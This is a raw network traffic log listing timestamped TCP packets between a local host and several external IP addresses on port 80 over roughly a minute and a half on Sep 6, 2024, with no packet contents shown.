              Sep 6, 2024 09:06:35.510520935 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510535955 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510567904 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.515091896 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.515125036 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.515140057 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.515161991 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.566514015 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.596462011 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.596545935 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.596589088 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.596724987 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.596767902 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:36.442080975 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:37.462832928 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:37.467839956 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:37.467931032 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:37.482142925 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:37.486958981 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151392937 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151427984 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151439905 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151479959 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151493073 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151542902 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.151575089 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.151596069 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151607990 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151619911 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151628971 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151639938 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.151742935 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.151819944 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.156495094 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.156514883 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.157470942 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.160900116 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.160964012 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.161005020 CEST8049750184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:38.161034107 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.161497116 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:38.988558054 CEST4975080192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.008234024 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.013293028 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.013370037 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.027431011 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.032289028 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.032390118 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600023031 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600044966 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600058079 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600079060 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600091934 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600102901 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600162029 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600159883 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600177050 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600197077 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600263119 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600281954 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.600334883 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.600428104 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.605159044 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605216980 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605228901 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605252981 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.605726957 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:40.686697960 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.686736107 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.686763048 CEST8049751184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:40.687503099 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:41.535367966 CEST4975180192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.554510117 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.559441090 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:42.559552908 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.567337036 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:42.572240114 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148684025 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148705006 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148716927 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148777962 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148783922 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148789883 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148806095 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148818970 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148838997 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148921967 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.148951054 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148963928 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.148972988 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.149010897 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.149010897 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.153892994 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.153904915 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.153915882 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.154057026 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.154192924 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.154252052 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.237215996 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237231016 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237258911 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:43.237344027 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.237390041 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.243303061 CEST4975280192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:43.248449087 CEST8049752184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:48.546015024 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.550975084 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:48.551122904 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.561974049 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:48.566859961 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258800030 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258826971 CEST804975491.215.85.23192.168.2.6
              Sep 6, 2024 09:06:49.258887053 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:50.066663027 CEST4975480192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.086873055 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.092266083 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:51.092339039 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.107414007 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:51.113291025 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:52.613533020 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:06:52.707994938 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.633281946 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.638190985 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.638263941 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.652947903 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:53.657772064 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:53.657882929 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344257116 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344285011 CEST804975691.215.85.23192.168.2.6
              Sep 6, 2024 09:06:54.344364882 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:55.161209106 CEST4975680192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.179440022 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.184367895 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.185498953 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.192811012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.197669983 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875104904 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875149965 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875161886 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875176907 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875185013 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875211954 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875226021 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875251055 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875262022 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875355005 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.875391960 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.875391960 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.875441074 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.880250931 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880306005 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880317926 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880371094 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.880412102 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.881525040 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.999675989 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999687910 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999763966 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999861002 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:06:56.999974012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:56.999974012 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:57.005136967 CEST4975780192.168.2.691.215.85.23
              Sep 6, 2024 09:06:57.009888887 CEST804975791.215.85.23192.168.2.6
              Sep 6, 2024 09:07:02.741434097 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.746330976 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:02.746403933 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.758654118 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:02.763634920 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:04.273407936 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:04.278733969 CEST8049758121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:04.279505014 CEST4975880192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.296504974 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.301496983 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:05.301558018 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.315206051 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:05.320095062 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426810980 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426831961 CEST8049759121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:06.426978111 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:06.819713116 CEST4975980192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.836419106 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.841417074 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:07.841491938 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.855396986 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:07.861768961 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:07.861920118 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026575089 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026618958 CEST8049760121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:09.026693106 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:09.363502026 CEST4976080192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.383610010 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.388492107 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:10.388607025 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.396234035 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:10.401037931 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.579998016 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.580018044 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:11.581505060 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:11.583024025 CEST4976180192.168.2.6121.199.37.19
              Sep 6, 2024 09:07:11.587893009 CEST8049761121.199.37.19192.168.2.6
              Sep 6, 2024 09:07:12.465154886 CEST804975591.215.85.23192.168.2.6
              Sep 6, 2024 09:07:12.465363026 CEST4975580192.168.2.691.215.85.23
              Sep 6, 2024 09:07:16.929394960 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.934184074 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:16.937534094 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.949395895 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:16.954230070 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619527102 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619558096 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619573116 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619585991 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619609118 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619613886 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619630098 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619636059 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619647980 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619673014 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:17.619718075 CEST8049762188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:17.619765997 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:18.457338095 CEST4976280192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.477448940 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.482708931 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:19.482774973 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.497196913 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:19.502038002 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122401953 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122430086 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122441053 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122453928 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122464895 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122479916 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122493029 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122543097 CEST8049763188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:20.122716904 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:20.122716904 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:21.004117966 CEST4976380192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.022989988 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.027950048 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.028044939 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.038928986 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.046461105 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.046475887 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713160038 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713180065 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713191986 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713212013 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713228941 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713241100 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713243008 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713254929 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713280916 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713527918 CEST8049764188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:22.713536978 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:22.713774920 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:23.550992012 CEST4976480192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.571403027 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.576298952 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:24.579582930 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.586982965 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:24.591809034 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218151093 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218178034 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218189955 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218200922 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218210936 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218221903 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218234062 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218312979 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218353987 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218358994 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218372107 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218384027 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.218425035 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.218425035 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.223184109 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.223203897 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.223242998 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305404902 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305438995 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305459976 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305473089 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305486917 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305512905 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305512905 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305762053 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305809975 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.305824041 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305835962 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305860043 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.305879116 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.306363106 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:25.306418896 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.311950922 CEST4976580192.168.2.6188.114.96.3
              Sep 6, 2024 09:07:25.316770077 CEST8049765188.114.96.3192.168.2.6
              Sep 6, 2024 09:07:30.345396042 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.350364923 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.350502968 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.361263990 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:30.366177082 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.821768999 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:30.825609922 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:31.863483906 CEST4976680192.168.2.63.33.130.190
              Sep 6, 2024 09:07:31.868375063 CEST80497663.33.130.190192.168.2.6
              Sep 6, 2024 09:07:32.883573055 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.888789892 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:32.891660929 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.903429031 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:32.908375978 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:33.381902933 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:33.381973028 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:34.410998106 CEST4976780192.168.2.63.33.130.190
              Sep 6, 2024 09:07:34.420341015 CEST80497673.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.430211067 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.435239077 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.435326099 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.448297977 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:35.453202009 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.453294992 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.906856060 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:35.906941891 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:36.957247972 CEST4976880192.168.2.63.33.130.190
              Sep 6, 2024 09:07:36.962208986 CEST80497683.33.130.190192.168.2.6
              Sep 6, 2024 09:07:37.976974964 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.982037067 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:37.982117891 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.989592075 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:37.994688988 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405561924 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405599117 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:39.405725002 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:39.408957958 CEST4976980192.168.2.63.33.130.190
              Sep 6, 2024 09:07:39.413885117 CEST80497693.33.130.190192.168.2.6
              Sep 6, 2024 09:07:44.501033068 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.508744955 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:44.511543036 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.522728920 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:44.527635098 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:46.035533905 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:46.087918997 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:47.057430029 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.062319994 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:47.062463999 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.075408936 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:47.080233097 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:48.582233906 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:48.631947041 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.603183985 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.608128071 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.608202934 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.625061035 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:49.629882097 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:49.630023003 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:51.129077911 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:07:51.175942898 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:52.147599936 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:07:52.152586937 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:07:52.152692080 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:07:52.159965992 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:07:52.164781094 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:07:54.061944008 CEST80497705.144.130.52192.168.2.6
